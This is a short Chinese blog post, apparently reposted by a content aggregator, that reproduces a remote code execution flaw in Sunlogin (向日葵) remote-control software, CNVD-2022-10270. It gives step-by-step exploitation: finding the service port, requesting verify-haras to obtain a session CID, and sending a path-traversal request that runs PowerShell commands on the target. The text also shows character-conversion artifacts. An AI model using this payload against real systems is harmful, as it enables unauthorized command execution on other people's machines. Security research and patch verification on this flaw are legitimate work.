CNVD-2022-10270/CNVD-2022-03672 向日葵RCE復現(xiàn)

1. 我們先安裝漏洞版本的向日葵也就是<=11.0.0.33版本的，

2. 打開向日葵，連接服務器成功才可以

3. 打開之后會自動開啟一個端口（40000-60000）之間隨機的，我們掃描一下端口（查看安裝向日葵電腦的ip）

4. 瀏覽器訪問ip+端口號+cgi-bin/rpc?action=verify-haras(獲取session值CID)一個一個端口嘗試

5. 拿到CID-添加payload和cookie-發(fā)送

http://192.168.234.139:49676/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

總結

以上是生活随笔為你收集整理的向日葵RCE的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。